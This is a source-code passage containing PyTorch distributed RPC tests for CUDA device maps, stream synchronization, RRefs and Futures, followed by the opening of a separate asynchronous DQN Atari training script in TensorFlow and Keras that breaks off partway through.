x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor.fill_(1)
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(unwrapper(future.wait()), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0]
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
async_dqn.py
|
#!/usr/bin/env python
import os
os.environ["KERAS_BACKEND"] = "tensorflow"
from skimage.transform import resize
from skimage.color import rgb2gray
from atari_environment import AtariEnvironment
import threading
import tensorflow as tf
import sys
import random
import numpy as np
import time
import gym
from keras import backend as K
from model import build_network
from keras import backend as K
flags = tf.app.flags
flags.DEFINE_string('experiment', 'dqn_breakout', 'Name of the current experiment')
flags.DEFINE_string('game', 'Breakout-v0', 'Name of the atari game to play. Full list here: https://gym.openai.com/envs#atari')
flags.DEFINE_integer('num_concurrent', 8, 'Number of concurrent actor-learner threads to use during training.')
flags.DEFINE_integer('tmax', 80000000, 'Number of training timesteps.')
flags.DEFINE_integer('resized_width', 84, 'Scale screen to this width.')
flags.DEFINE_integer('resized_height', 84, 'Scale screen to this height.')
flags.DEFINE_integer('agent_history_length', 4, 'Use this number of recent screens as the environment state.')
flags.DEFINE_integer('network_update_frequency', 32, 'Frequency with which each actor learner thread does an async gradient update')
flags.DEFINE_integer('target_network_update_frequency', 10000, 'Reset the target network every n timesteps')
flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.')
flags.DEFINE_float('gamma', 0.99, 'Reward discount rate.')
flags.DEFINE_integer('anneal_epsilon_timesteps', 1000000, 'Number of timesteps to anneal epsilon.')
flags.DEFINE_string('summary_dir', '/tmp/summaries', 'Directory for storing tensorboard summaries')
flags.DEFINE_string('checkpoint_dir', '/tmp/checkpoints', 'Directory for storing model checkpoints')
flags.DEFINE_integer('summary_interval', 5,
'Save training summary to file every n seconds (rounded '
'up to statistics interval.')
flags.DEFINE_integer('checkpoint_interval', 600,
'Checkpoint the model (i.e. save the parameters) every n '
'seconds (rounded up to statistics interval.')
flags.DEFINE_boolean('show_training', True, 'If true, have gym render evironments during training')
flags.DEFINE_boolean('testing', False, 'If true, run gym evaluation')
flags.DEFINE_string('checkpoint_path', 'path/to/recent.ckpt', 'Path to recent checkpoint to use for evaluation')
flags.DEFINE_string('eval_dir', '/tmp/', 'Directory to store gym evaluation')
flags.DEFINE_integer('num_eval_episodes', 100, 'Number of episodes to run gym evaluation.')
FLAGS = flags.FLAGS
T = 0
TMAX = FLAGS.tmax
def sample_final_epsilon():
"""
Sample a final epsilon value to anneal towards from a distribution.
These values are specified in section 5.1 of http://arxiv.org/pdf/1602.01783v1.pdf
"""
final_epsilons = np.array([.1,.01,.5])
